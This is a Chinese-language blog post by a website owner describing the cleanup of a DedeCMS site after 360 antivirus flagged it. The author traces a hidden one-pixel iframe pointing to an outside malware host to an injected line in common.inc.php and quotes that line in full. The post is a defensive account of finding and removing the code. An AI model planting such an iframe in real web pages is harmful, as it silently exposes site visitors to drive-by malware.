dedecms做的网站给挂马

今天打开之前做的一个网站，发现360提示有挂马且已经成功拦截窗口，这时觉得奇怪的，连一个这样的网站也给挂马？接着打开网页，查看源代码，发现有一句<iframe....></iframe>这样的代码，这句在我原来良好网页代码里是不会出现的。可断定，就是因为这句代码所作的怪！

那就进行一步步的查代码吧！毕竟这个网站是用dedecms来做的，是开源的。但毕竟也不是自己写的，所以要查起来都比较麻烦。都唔知从什么地方下手好，后来打算重新生成一次静态页，在生成时就也同样提示这个窗，并且进入后台也出现这个窗口提示的。心想，那极有可能是在公用的PHP页面里给改了。

后来在清除页面缓存时无意中发现有一行细细的线，右键打开源代码，一看，也有一句iframe在，所以就决定在这个页面入手，查其模板文件，鼠标点击后提交到那个php的，慢慢一步步的查，特别是用了require_once这样的语句入的php页面，先查到引用了require_once(dirname(__FILE__)."/config.php");页，打开config.php后再发现又引用了require_once(DEDEADMIN.'/../include/common.inc.php');,再打开common.inc.php，CTRL+F,搜索iframe，就提示在函数ShowMsg()这个方法里多了一句：

<iframe src=http://kukebase.a54.huyi5.com/web.html width=123 height=1></iframe>
</head>\r\n<body leftmargin='0' topmargin='0'>

就是这句，将其删除后再重新生成一次静态页，没有提示了。只是右下角还有提示说网站发现有挂马的。不知道360什么时候再重新收录一次并清除这个提示呢？


问题解决了，就细想，如何挂马到我网页里的呢？并且更改的是后台用到的php这个页面，是如何做到的呢？常规的讲法就是网站上漏洞，上传了一些可执行的文件或php文件之类的，查看了一下，上传设置那里只允许了zip|gz|rar|iso|doc|xsl|ppt|wps|pdf|doc|xls这几个文件的，不知道是从什么地方上传上来的，用户中心是没有做的，所以说通过编辑器来上传又觉得不太可能。百思不得其解。


如你知道，麻烦你跟帖留言告知一声！谢谢！